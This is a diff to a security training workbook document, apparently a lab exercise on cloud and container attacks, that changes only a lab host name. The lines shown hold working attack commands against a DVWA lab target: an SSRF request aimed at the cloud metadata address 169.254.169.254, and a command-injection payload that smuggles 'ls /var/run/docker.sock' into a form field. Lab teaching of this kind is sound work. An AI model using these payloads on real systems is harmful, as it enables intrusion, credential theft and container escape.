--- a/contents/battle-workbook/cloud-container-w15.docx
+++ b/contents/battle-workbook/cloud-container-w15.docx
@@ -318,9 +318,9 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>curl -s -H "Host: dvwa.6v6.lab" "http://192.168.0.161/?url=http://169.254.169.254/cc15r1-kim"</w:t>
+        <w:t>curl -s -H "Host: dvwa.el34.lab" "http://192.168.0.161/?url=http://169.254.169.254/cc15r1-kim"</w:t>
         <w:br/>
-        <w:t>curl -s -A "cc15r1-kim" -H "Host: dvwa.6v6.lab" \</w:t>
+        <w:t>curl -s -A "cc15r1-kim" -H "Host: dvwa.el34.lab" \</w:t>
         <w:br/>
         <w:t xml:space="preserve">  "http://192.168.0.161/vulnerabilities/exec/?ip=127.0.0.1;ls%20/var/run/docker.sock%23cc15r1-kim&amp;Submit=Submit"</w:t>
       </w:r>
